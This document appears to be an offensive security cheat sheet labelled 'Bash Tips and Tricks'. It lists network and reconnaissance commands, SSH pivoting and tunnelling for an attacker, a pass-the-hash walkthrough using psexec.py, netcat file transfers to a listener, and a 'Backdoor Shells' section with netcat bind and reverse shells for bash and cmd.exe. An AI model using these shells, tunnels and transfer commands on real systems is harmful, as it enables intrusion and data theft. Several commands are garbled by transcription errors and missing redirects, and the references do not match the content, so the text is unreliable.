Bash Tips and Tricks
Network Commands
watch ss -tp
Short Description: Monitor network connections in real-time.
Tactics and Techniques: Network Communication
netstat -ant
Short Description: Display TCP connections.
Tactics and Techniques: TCP Communication
netstat -tulpn
Short Description: Display all active connections with PIDs.
Tactics and Techniques: Communication with PIDs
lsof -i
Short Description: List open files related to network connections.
Tactics and Techniques: Established Communication
smb://ip/share
Short Description: Access SMB shared environment.
Tactics and Techniques: SMB Shared Environment Access
share user x.x.x.x c$
Short Description: Mount the shared Windows environment.
Tactics and Techniques: Mounting Shared Windows Environment
smbclient -0 user\ ip \ share
Short Description: Connect to SMB.
Tactics and Techniques: Connect to SMB
ifconfig eth# ip I cidr
Short Description: Set IP and netmask.
Tactics and Techniques: IP and Netmask Setting
ifconfig eth0:1 ip I cidr
Short Description: Create a virtual interface.
Tactics and Techniques: Virtual Interface Setting
route add default gw gw lp
Short Description: Set the default gateway.
Tactics and Techniques: Set Default Gateway
ifconfig eth# mtu [size]
Short Description: Change the MTU size.
Tactics and Techniques: Change MTU Size
export MAC=xx:XX:XX:XX:XX:XX
Short Description: Change the MAC address.
Tactics and Techniques: Change MAC Address
ifconfig int hw ether MAC
Short Description: Change the MAC address.
Tactics and Techniques: Change MAC Address
macchanger -m MAC int
Short Description: Change MAC address (Backtrack).
Tactics and Techniques: Change MAC in Backtrack
iwlist int scan
Short Description: Wi-Fi scanner.
Tactics and Techniques: Wi-Fi Scanning
nc -lvvp port
Short Description: Listen to a specific port.
Tactics and Techniques: Listening on a Specific Port
python3 -m http.server port
Short Description: Create a web server.
Tactics and Techniques: Create Web Server
dig -x ip
Short Description: Identify the domains of an IP.
Tactics and Techniques: Identify IP Domains
host ip
Short Description: Identify the domains of an IP.
Tactics and Techniques: Identify IP Domains
host -t SRV _service tcp.url.com
Short Description: Identify domain SRV.
Tactics and Techniques: Identify Domain SRV
dig @ip domain -t AXrR
Short Description: Identify DNS Zone Transfer.
Tactics and Techniques: Identify DNS Zone Transfer
host -1 domain namesvr
Short Description: Identify DNS Zone Transfer.
Tactics and Techniques: Identify DNS Zone Transfer
ip xfrm state list
Short Description: Show available VPNs.
Tactics and Techniques: Show Available VPNs
ip addr add ip I cidr aev ethO
Short Description: Add a 'hidden' interface.
Tactics and Techniques: Add Hidden Interface
/var/log/messages I grep DHCP
Short Description: List DHCP entries.
Tactics and Techniques: DHCP List
tcpkill host ip and port port
Short Description: Block IP and port.
Tactics and Techniques: Blocking IP and Port
echo "1" /proc/sys/net/ipv4/ip_forward
Short Description: Enable IP forwarding.
Tactics and Techniques: Enable IP Forwarding
echo ‘‘nameserver x.x.x.x’’ /etc/resolv.conf
Short Description: Add DNS server.
Tactics and Techniques: Add DNS Server
showmount -e ip
Short Description: Show mounted points.
Tactics and Techniques: Show Mounted Points
mkdir /site_backups; mount -t nfs ip:/ /site_backup
Short Description: Mount NFS share by IP.
Tactics and Techniques: Mount NFS Share by IP
Configure x11 Forwarding for the Attacker
xhost+ vi ~/.ssh/config # Ensure 'ForwardX11 yes' ssh -X root@2.2.2.2
Create Port Forward on Port 8080 and Forward it to Attacker's Port 443
ssh -R8080:127.0.0.1:443 root@2.2.2.2
Use Port Forward on Attacker's Port 8080 and Forward Data using SSH Tunnel to Port 3300 on 3.3.3.3
ssh -L8080:3.3.3.3:443 root@2.2.2.2
Dynamic Tunnel using proxychains. Also, edit /etc/proxychains.conf to set the port (1080)
ssh -D1080 root@2.2.2.2 In a separate terminal, run: proxychains nmap -sT -p80,443 3.3.3.3
Create SSH Tunnel as Multi-hop
ssh -L 8888:127.0.0.1:8444 50mctf@MY_VPS ssh -v -o PubkeyAuthentication=no -o PreferredAuthentications=password -o GatewayPorts=yes -fN -R *:8444:172.28.0.3:80 50mctf@MY_VPS
PTH with Linux
Perform Pass-the-Hash with Linux:
# Install krb5-user package apt-get install krb5-user # Set KRB5CCNAME environment variable export KRB5CCNAME=/tmp/krb5cc_123 # Use proxychains to execute psexec.py proxychains psexec.py -k -no-pass -debug -dc -ip 10.1.1.2 adm_domain@OPS -CHILDDC
File Transfer
# Sending a file nc.exe 10.10.10.10 < "file.log" # Receiving a file nc -vnlp 1234 > file.txt
# Grab a [filename] from a Listener: # 1. Start Listener to push [filename] $ nc -l -p [port] > [filename] # 2. Connect to [TargetIP] and Retrieve [filename] $ nc -w3 [TargetIP] [port] < [filename] # Push a [filename] to Listener: # 1. Start Listener to pull [filename] $ nc -l -p [port] > [filename] # 2. Connect to [TargetIP] and push [filename] $ nc -w3 [TargetIP] [port] < [filename]
Backdoor Shells
# Linux Shell: $ nc -l -p [port] -e /bin/bash # Linux Reverse Shell: $ nc [LocalIP] [port] -e /bin/bash # Windows Shell: $ nc -l -p [port] -e cmd.exe # Windows Reverse Shell: $ nc [LocalIP] [port] -e cmd.exe
Discord: https://discord.gg/CqV6aJXMkA
Telegram: https://t.me/Hadess_security
Reference
https://labs.hakaioffsec.com/nginx-alias-traversal/
https://devsecopsguides.com/docs/checklists/nginx/